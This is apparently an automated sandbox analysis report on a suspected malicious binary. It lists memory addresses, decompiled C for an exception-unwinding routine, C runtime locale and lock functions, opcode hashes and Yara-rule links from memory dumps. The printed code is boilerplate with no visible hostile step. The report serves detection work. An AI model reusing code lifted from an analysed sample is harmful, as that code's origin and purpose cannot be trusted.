                                                                                                                                                                              0x66db265f
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db265f
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db2655
                                                                                                                                                                              0x66db25d8
                                                                                                                                                                              0x66db25db
                                                                                                                                                                              0x66db25e0
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db25e9
                                                                                                                                                                              0x66db25eb
                                                                                                                                                                              0x66db25f1
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db25f7
                                                                                                                                                                              0x66db25fd
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db2603
                                                                                                                                                                              0x66db2605
                                                                                                                                                                              0x66db260e
                                                                                                                                                                              0x66db2612
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db2618
                                                                                                                                                                              0x66db261b
                                                                                                                                                                              0x66db261d
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db2624
                                                                                                                                                                              0x66db2626
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db2628
                                                                                                                                                                              0x66db262c
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db262c
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db2517
                                                                                                                                                                              0x66db2517
                                                                                                                                                                              0x66db2517
                                                                                                                                                                              0x66db251e
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db2520
                                                                                                                                                                              0x66db2521
                                                                                                                                                                              0x66db2523
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db2523
                                                                                                                                                                              0x66db254b
                                                                                                                                                                              0x66db254d
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db255d
                                                                                                                                                                              0x66db255f
                                                                                                                                                                              0x66db2561
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db2567
                                                                                                                                                                              0x66db256e
                                                                                                                                                                              0x66db259a
                                                                                                                                                                              0x66db259a
                                                                                                                                                                              0x66db259c
                                                                                                                                                                              0x66db259e
                                                                                                                                                                              0x66db25b2
                                                                                                                                                                              0x66db25b4
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db25a0
                                                                                                                                                                              0x66db25a0
                                                                                                                                                                              0x66db25a0
                                                                                                                                                                              0x66db25a9
                                                                                                                                                                              0x66db25aa
                                                                                                                                                                              0x66db25ac
                                                                                                                                                                              0x66db25ae
                                                                                                                                                                              0x66db25ae
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db25a0
                                                                                                                                                                              0x66db2570
                                                                                                                                                                              0x66db2573
                                                                                                                                                                              0x66db2575
                                                                                                                                                                              0x66db2587
                                                                                                                                                                              0x66db2587
                                                                                                                                                                              0x66db258a
                                                                                                                                                                              0x66db258c
                                                                                                                                                                              0x66db258c
                                                                                                                                                                              0x66db258d
                                                                                                                                                                              0x66db258d
                                                                                                                                                                              0x66db2593
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db2577
                                                                                                                                                                              0x66db2577
                                                                                                                                                                              0x66db2577
                                                                                                                                                                              0x66db257e
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db2580
                                                                                                                                                                              0x66db2580
                                                                                                                                                                              0x66db2581
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db2581
                                                                                                                                                                              0x66db2583
                                                                                                                                                                              0x66db2585
                                                                                                                                                                              0x66db2598
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db2598
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db2585
                                                                                                                                                                              0x66db24f7
                                                                                                                                                                              0x66db24fa
                                                                                                                                                                              0x66db24fd
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db24ff
                                                                                                                                                                              0x66db2501
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db2501
                                                                                                                                                                              0x66db24c6
                                                                                                                                                                              0x66db24c8
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000

                                                                                                                                                                              APIs
                                                                                                                                                                              • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 66DB2536
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000001.00000002.1014684015.0000000066DB1000.00000020.00020000.sdmp, Offset: 66DB0000, based on PE: true
                                                                                                                                                                              • Associated: 00000001.00000002.1014676007.0000000066DB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000001.00000002.1014691870.0000000066DB3000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000001.00000002.1014699312.0000000066DB5000.00000004.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000001.00000002.1014708057.0000000066DB6000.00000002.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MemoryQueryVirtual
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2850889275-0
                                                                                                                                                                              • Opcode ID: c32d686900352fc2914432cbedbbda1cbf4dd1c02312073a55662335aef9756c
                                                                                                                                                                              • Instruction ID: ce00460210b744401274f97c292c8fb490fda183760ee4fcf466e1ae07ae3961
                                                                                                                                                                              • Opcode Fuzzy Hash: c32d686900352fc2914432cbedbbda1cbf4dd1c02312073a55662335aef9756c
                                                                                                                                                                              • Instruction Fuzzy Hash: 8B61C5F2E14612CFEB19CF28C8A077973F1AB9A35DB248429D557C729CE730D842CA94
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 66DB2264, Relevance: .1, Instructions: 77COMMONCrypto
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 71%
                                                                                                                                                                              			E66DB2264(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E66DB23CB(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E66DB2485(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E66DB2370(_t55, _t66);
										_t89 = _t66 + 0x10;
										E66DB23CB(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E66DB2467(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}























                                                                                                                                                                              0x66db2268
                                                                                                                                                                              0x66db2269
                                                                                                                                                                              0x66db226a
                                                                                                                                                                              0x66db226d
                                                                                                                                                                              0x66db226f
                                                                                                                                                                              0x66db2272
                                                                                                                                                                              0x66db2273
                                                                                                                                                                              0x66db2275
                                                                                                                                                                              0x66db2276
                                                                                                                                                                              0x66db2277
                                                                                                                                                                              0x66db227a
                                                                                                                                                                              0x66db2284
                                                                                                                                                                              0x66db2335
                                                                                                                                                                              0x66db233c
                                                                                                                                                                              0x66db2345
                                                                                                                                                                              0x66db228a
                                                                                                                                                                              0x66db228a
                                                                                                                                                                              0x66db2290
                                                                                                                                                                              0x66db2296
                                                                                                                                                                              0x66db2299
                                                                                                                                                                              0x66db229c
                                                                                                                                                                              0x66db22a0
                                                                                                                                                                              0x66db22a5
                                                                                                                                                                              0x66db22aa
                                                                                                                                                                              0x66db232a
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db22ac
                                                                                                                                                                              0x66db22ac
                                                                                                                                                                              0x66db22b8
                                                                                                                                                                              0x66db22ba
                                                                                                                                                                              0x66db2315
                                                                                                                                                                              0x66db2315
                                                                                                                                                                              0x66db231b
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db22bc
                                                                                                                                                                              0x66db22cb
                                                                                                                                                                              0x66db22cd
                                                                                                                                                                              0x66db22ce
                                                                                                                                                                              0x66db22cf
                                                                                                                                                                              0x66db22d2
                                                                                                                                                                              0x66db22d2
                                                                                                                                                                              0x66db22d4
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db22d6
                                                                                                                                                                              0x66db22d6
                                                                                                                                                                              0x66db2320
                                                                                                                                                                              0x66db22d8
                                                                                                                                                                              0x66db22d8
                                                                                                                                                                              0x66db22dc
                                                                                                                                                                              0x66db22e4
                                                                                                                                                                              0x66db22e9
                                                                                                                                                                              0x66db22ee
                                                                                                                                                                              0x66db22fa
                                                                                                                                                                              0x66db2302
                                                                                                                                                                              0x66db2309
                                                                                                                                                                              0x66db230f
                                                                                                                                                                              0x66db2313
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db2313
                                                                                                                                                                              0x66db22d6
                                                                                                                                                                              0x66db22d4
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db22ba
                                                                                                                                                                              0x66db232e
                                                                                                                                                                              0x66db232e
                                                                                                                                                                              0x66db232e
                                                                                                                                                                              0x66db22aa
                                                                                                                                                                              0x66db234a
                                                                                                                                                                              0x66db2351

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000001.00000002.1014684015.0000000066DB1000.00000020.00020000.sdmp, Offset: 66DB0000, based on PE: true
                                                                                                                                                                              • Associated: 00000001.00000002.1014676007.0000000066DB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000001.00000002.1014691870.0000000066DB3000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000001.00000002.1014699312.0000000066DB5000.00000004.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000001.00000002.1014708057.0000000066DB6000.00000002.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                                                                                                                                              • Instruction ID: f346de6bb1f4383d71244993f3802f605830ceb403d1faf00df7ec041cf7fbaa
                                                                                                                                                                              • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                                                                                                                                              • Instruction Fuzzy Hash: DC2174B3900204DBDB11DF68CC809BBBBA5FF49358B458168D9569B249DB30FA15CBE0
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 66DFBAF2, Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000001.00000002.1014767810.0000000066DFB000.00000040.00020000.sdmp, Offset: 66DFB000, based on PE: false
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
                                                                                                                                                                              • Instruction ID: 01d17200c03a281cce422d118cefa4de363f8d0bcc28a903e50b13bf664be685
                                                                                                                                                                              • Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
                                                                                                                                                                              • Instruction Fuzzy Hash: 271181737505009FD714CF59ECC0EA2B3AAEB9927072A8566ED08CB355D636E852C7A0
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 66DFBEEB, Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000001.00000002.1014767810.0000000066DFB000.00000040.00020000.sdmp, Offset: 66DFB000, based on PE: false
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
                                                                                                                                                                              • Instruction ID: cbe950c9313282bc840db58f830b8550d4280686989efd8c88db6aeb8cce91b3
                                                                                                                                                                              • Opcode Fuzzy Hash: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
                                                                                                                                                                              • Instruction Fuzzy Hash: BC01D23A324140CFD744CF2CD984D69B7F4EFC5320B16807EC44683656D135E446CA60
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 66DEB977, Relevance: 15.1, APIs: 10, Instructions: 95COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000001.00000002.1014724687.0000000066DBF000.00000020.00020000.sdmp, Offset: 66DBF000, based on PE: false
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __calloc_crt$___freetlocinfo___removelocaleref$__calloc_impl__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3967206232-0
                                                                                                                                                                              • Opcode ID: 58edc2626cea369d9bd2bf9cad0fd8da07ab6484f9637d7230123ac1d116b8ec
                                                                                                                                                                              • Instruction ID: ed153e7a49f4c056e02f723f7bc5717cfc3f2ee639753e2fd9f5520210ab885d
                                                                                                                                                                              • Opcode Fuzzy Hash: 58edc2626cea369d9bd2bf9cad0fd8da07ab6484f9637d7230123ac1d116b8ec
                                                                                                                                                                              • Instruction Fuzzy Hash: 0F213831545701EBEF315F24DD00E4A7FF5EFA6724B504419F4986A5E0DF31A800C6B0
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 66DEAE14, Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • __lock.LIBCMT ref: 66DEAD6B
                                                                                                                                                                                • Part of subcall function 66DE74AB: __mtinitlocknum.LIBCMT ref: 66DE74C1
                                                                                                                                                                                • Part of subcall function 66DE74AB: __amsg_exit.LIBCMT ref: 66DE74CD
                                                                                                                                                                              • __lock.LIBCMT ref: 66DEADAB
                                                                                                                                                                              • ___removelocaleref.LIBCMT ref: 66DEADBA
                                                                                                                                                                              • ___freetlocinfo.LIBCMT ref: 66DEADD3
                                                                                                                                                                                • Part of subcall function 66DE927A: __lock.LIBCMT ref: 66DE9298
                                                                                                                                                                                • Part of subcall function 66DE927A: ___sbh_find_block.LIBCMT ref: 66DE92A3
                                                                                                                                                                                • Part of subcall function 66DE927A: ___sbh_free_block.LIBCMT ref: 66DE92B2
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000001.00000002.1014724687.0000000066DBF000.00000020.00020000.sdmp, Offset: 66DBF000, based on PE: false
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __lock$___freetlocinfo___removelocaleref___sbh_find_block___sbh_free_block__amsg_exit__mtinitlocknum
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2822171422-0
                                                                                                                                                                              • Opcode ID: feb46607815f43d331bef93ad53a7cb76f8c45456e0f14c504f85b4f836d4b2a
                                                                                                                                                                              • Instruction ID: 0bd05eea2dc5e870b771cdddbdf79b51487a81cd16a8979b0736d0dbc6703cf5
                                                                                                                                                                              • Opcode Fuzzy Hash: feb46607815f43d331bef93ad53a7cb76f8c45456e0f14c504f85b4f836d4b2a
                                                                                                                                                                              • Instruction Fuzzy Hash: E111A039A01702EBDB208F64980470E7BB4AF80B26F684519E8A9DB1C0EB75D881C670
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 66DEAC1F, Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • __getptd.LIBCMT ref: 66DEAC2B
                                                                                                                                                                                • Part of subcall function 66DE8F2A: __getptd_noexit.LIBCMT ref: 66DE8F2D
                                                                                                                                                                                • Part of subcall function 66DE8F2A: __amsg_exit.LIBCMT ref: 66DE8F3A
                                                                                                                                                                              • __getptd.LIBCMT ref: 66DEAC42
                                                                                                                                                                              • __amsg_exit.LIBCMT ref: 66DEAC50
                                                                                                                                                                              • __lock.LIBCMT ref: 66DEAC60
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000001.00000002.1014724687.0000000066DBF000.00000020.00020000.sdmp, Offset: 66DBF000, based on PE: false
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3521780317-0
                                                                                                                                                                              • Opcode ID: dc0ddddfc0f3be1efff0c4b580e1e8a09aad0bb8b5e6f8e209a9bb275d3cbf43
                                                                                                                                                                              • Instruction ID: 428e17e1409b1ff7272075dd2d896dafccd1f0273c70f301100df014f339cabf
                                                                                                                                                                              • Opcode Fuzzy Hash: dc0ddddfc0f3be1efff0c4b580e1e8a09aad0bb8b5e6f8e209a9bb275d3cbf43
                                                                                                                                                                              • Instruction Fuzzy Hash: 1FF0BE36F40716EBEB20DF74980074DBBB1AF40728F09820AE5409B2C0DB74A902CB72
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%